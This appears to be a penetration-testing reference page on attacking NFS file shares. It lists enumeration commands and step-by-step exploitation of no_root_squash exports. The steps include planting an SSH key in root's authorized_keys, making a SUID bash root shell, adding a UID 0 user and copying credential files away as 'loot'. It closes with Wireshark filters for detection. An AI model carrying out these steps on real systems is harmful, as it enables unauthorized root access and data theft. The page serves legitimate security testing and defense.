Notes
| Alternative Ports |
|---|
| 2049 TCP/UDP (default) |
| 111 TCP/UDP (Portmapper/RPCbind) |
Service Description NFS (Network File System) is a distributed file system protocol allowing a user on a client computer to access files over a network in a manner similar to how local storage is accessed. It relies on Remote Procedure Calls (RPC) and is commonly used in Unix/Linux environments for centralized file storage.
Warning
NFSv2 and NFSv3 have inherent security weaknesses, including a reliance on client-side security enforcement and transmission of data in plaintext. NFSv4 introduced stronger security mechanisms like Kerberos-based authentication and encryption.
Attacks
Misconfigured Share Permissions
Shares exported with weak permissions (no_root_squash, insecure, rw) allow remote users to access, modify, or create files with elevated (often root) privileges.
no_root_squash Vulnerability
If a share is exported with no_root_squash enabled, a remote root user on a client machine can create, modify, or access files as the root user on the NFS server, leading to trivial privilege escalation.
Information Disclosure Exported shares can expose sensitive information, user home directories, application configuration files, or backups.
Client-Side UID/GID Spoofing
An attacker can create a local user on their client machine with a specific UID/GID that matches a privileged user on the NFS server (e.g., root with UID 0). When mounting the share, they may inherit the permissions of that server-side user.
NFS Version Exploits Older versions of NFS may be susceptible to specific vulnerabilities. While less common now, it’s a potential vector on legacy systems.
Tools & Exploits
Enumeration
nmap Discover NFS shares and RPC information.
# Basic NFS discovery
nmap -sV -p 111,2049 --script nfs-ls,nfs-showmount,nfs-statfs <target>
showmount List exported filesystems from the target NFS server.
showmount -e <target>
rpcinfo Query the RPCbind/Portmapper to identify registered RPC services, including NFS.
rpcinfo -p <target>
Exploitation or Post-Enum
Mounting an Exposed Share Create a local directory and mount the remote NFS share.
mkdir /mnt/nfs_share
mount -t nfs <target>:<remote_share_path> /mnt/nfs_share
Common paths to try if unknown: /, /etc, /home, /var, /tmp
Exploiting no_root_squash
- On your attacker machine, switch to the
rootuser (sudo su). - Mount the NFS share as described above.
- Navigate into the mounted directory (
cd /mnt/nfs_share). You now haverootpermissions on the remote file system. - Common exploit primitives:
-
Add an SSH key: Copy your public SSH key to
/mnt/nfs_share/root/.ssh/authorized_keys. -
Create a SUID binary: cp /bin/bash /mnt/nfs_share/tmp/rootshell chmod +s /mnt/nfs_share/tmp/rootshell
Then, from a low-priv shell on the target, execute
/tmp/rootshell -pto get a root shell. -
Modify
/etc/passwd: Add a new user with UID 0. (Highly destructive, use with caution).
-
File/Directory Manipulation
Once mounted, use standard Linux commands (ls -la, cat, find, grep) to search for sensitive data.
- Look for configuration files (
.conf,.env,.xml) containing credentials. - Search for SSH private keys (
id_rsa), password files, or backups. find /mnt/nfs_share -name "*.bak" -o -name "*.old"grep -iR "password" /mnt/nfs_share
Data Exfiltration
Use cp or rsync to copy sensitive files from the mounted share to your local machine.
rsync -av /mnt/nfs_share/home/user/documents/ ./local_loot/
Wireshark Analysis Tips
Filters
nfs
rpc
portmapper
tcp.port == 2049 or udp.port == 2049
What to look for:
MOUNTprocedure calls to see which clients are mounting which shares.LOOKUP,READ,WRITEoperations to identify file access patterns.- Plaintext data in file transfers if NFSv2/v3 is in use.
CREATEoperations, especially for executable files or in sensitive system directories.